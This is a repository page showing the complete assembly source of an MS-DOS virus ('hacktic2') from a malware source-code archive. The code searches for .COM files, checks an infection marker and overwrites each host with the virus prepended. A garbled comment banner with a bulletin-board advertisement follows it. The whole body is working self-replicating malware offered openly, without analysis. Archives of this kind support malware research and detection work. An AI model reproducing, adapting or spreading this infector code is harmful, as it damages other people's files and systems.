ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-20 10:26:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
667983720e
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.hacktic2.asm

64 lines
2.7 KiB
NASM
Raw Normal View History

Add files via upload
2021-01-12 23:44:11 +00:00
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
len equ offset last-100h ;LENGTH OF VIRUS CODE
;
start: mov bx,0fh ;KLUDGE TO AVOID MEMALLOC ERROR
mov ah,4ah
int 21h
mov dx,es
add dh,10h
mov es,dx ;PROGRAM CODE WILL RUN HERE
push dx ;SET UP FOR FAR RETURN
push si
mov ah,26h ;CREATE NEW PSP
int 21h
mov di,si
mov si,offset last
push si
mov ch,0feh
rep movsb ;MOVE PROGRAM CODE UP
dec cx ;=FFFF
pop di
mov dx,offset file
mov ah,4eh ;FIND FIRST .COM FILE
jmp short find
retry: mov ah,4fh ;FIND NEXT
find: int 21h
jc nofile ;NO (MORE) FILES
mov dx,9eh ;FILE NAME IN DTA
mov ax,3d02h ;OPEN FILE
int 21h
xchg ax,bx ;1-BYTE MOVE OF AXBX
mov dx,di ;END OF VIRUS CODE
mov ah,3fh ;READ FILE DATA (CX=FFFF)
int 21h ;READ FILE AFTER VIRUS CODE
add ax,len ;LENGTH OF VIRUS+FILE
cmp byte ptr [di],0bbh ;CHECK IF ALREADY INFECTED
je retry ;TRY AGAIN
push ax
xor cx,cx
mov ax,4200h ;RESET FILE POINTER
cwd ;DX=0
int 21h
pop cx
mov dh,1
mov ah,40h ;WRITE INFECTED CODE BACK
int 21h
;
nofile: push es ;GO RUN PROGRAM
pop ds
retf
;
file db '*.COM',0 ;SEARCH FOR .COM FILES
last db 0c3h ;STANDALONE VIRUS CODE JUST RETURNS
tic ends
end start

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Reference in New Issue Copy Permalink